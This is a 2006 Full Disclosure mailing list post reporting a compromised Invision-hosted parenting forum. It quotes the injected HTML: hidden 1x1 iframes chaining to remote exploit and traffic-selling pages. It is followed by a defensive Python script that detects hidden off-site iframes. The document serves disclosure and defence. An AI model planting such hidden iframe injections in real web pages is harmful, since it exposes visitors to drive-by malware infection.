Full Disclosure mailing list archives

Invisionzone.com board hacked...and Invision won't do a thing...
From: psmith () metafore ca
Date: Mon, 3 Apr 2006 11:38:30 -0400


What is with irresponsible hosting companies?

I called Invision to report a hack where someone planted an iframe, which
is loading some exploits (wmf files and such). They will NOT do anything
unless the account holder calls in...so let's keep letting machines get
infected.

That is very irresponsible.

The site in question is http://september2002.invisionzone.com , (which is a
board my wife visits, other mothers with children born in September 2002)

Going there, you get:

<html>
<head>
<title>iframeCASH.biz</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<body>
<iframe src="http://www.doubleh.fr/audio/index.htm" width=1
height=1></iframe>
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />

Of course, the index.htm at doubleh.fr , has the following content:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1
height=1></iframe>
<iframe src="http://1-extreme.biz/traff.php?adv=35" width=1
height=1></iframe>
<iframe src='http://traff4all.biz/adv/174/new.php' width=1
height=1></iframe>
<iframe src="http://85.255.113.22/inc/nan49.html" width=1
height=1></iframe>
</body>
</html>

I didn't go beyond this, as I am ticked off from spending the last half an
hour trying to clean up after it.

However, Invision sure should have at least taken the URL to look at it.

Are all hosting companies like this? Very stupid.

I am not sure what it was trying to do, but it affected both Firefox and
MSIE. I have installed the latest SAV (04-02-2006) definitions and it
didn't say very much.

Thanks,

Paul

---------------------------------------------------
Paul W. Smith
Senior Network Operations Engineer
MCP, SCWSE, SCSA, SCNA, ACE, 3CSA, CNS, CLS, CLA, CRA, BCCA, JNCIA-FWV
Enterprise Services
Metafore IT Solutions
Direct: 905.362.7290
Cell: 416.271.6937
Toll Free: 800.563.7515 x 4086
psmith () metafore ca
http://www.metafore.ca

M E T A F O R E
IT SOLUTIONS
----------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
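
A defender-side check for the pattern quoted in the message above (1x1 iframes whose src points at another host), added here as an example and not part of the original post. The function names, the size threshold and the sample hosts are constructed assumptions; the check also treats CSS-hidden frames as hidden, which goes beyond the width/height case in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_HIDDEN_PX = 1  # assumption: frames this small are treated as hidden

def _tiny(value):
    """True if a width/height attribute is a pixel count <= MAX_HIDDEN_PX."""
    digits = (value or "").strip().lower()
    if digits.endswith("px"):
        digits = digits[:-2]
    return digits.isdigit() and int(digits) <= MAX_HIDDEN_PX

class HiddenFrameFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (line number, frame host, raw src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = (a.get("src") or "").strip()
        host = (urlparse(src).hostname or "").lower()
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        # Relative URLs have no host and stay on the page's own site.
        if hidden and host and host != self.page_host:
            self.findings.append((self.getpos()[0], host, src))

def find_hidden_offsite_iframes(html, page_host):
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page (reserved example hosts), not the page from the post.
SAMPLE = """<html><head><title>board</title></head><body>
<iframe src="http://tracker.example.net/a/index.htm" width=1
height=1></iframe>
<iframe src="http://cdn.example.com/player" width="600" height="400"></iframe>
<iframe src='http://198.51.100.7/inc/x.html' style="display: none"></iframe>
<iframe src="/local/widget" width=0 height=0></iframe></body></html>"""

if __name__ == "__main__":
    for line, host, src in find_hidden_offsite_iframes(SAMPLE, "forum.example.org"):
        print(f"line {line}: hidden iframe to {host} ({src})")
```

Run over saved copies of a site's pages, a finding on a page that previously had none is the signal to compare the file against a known-good copy.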

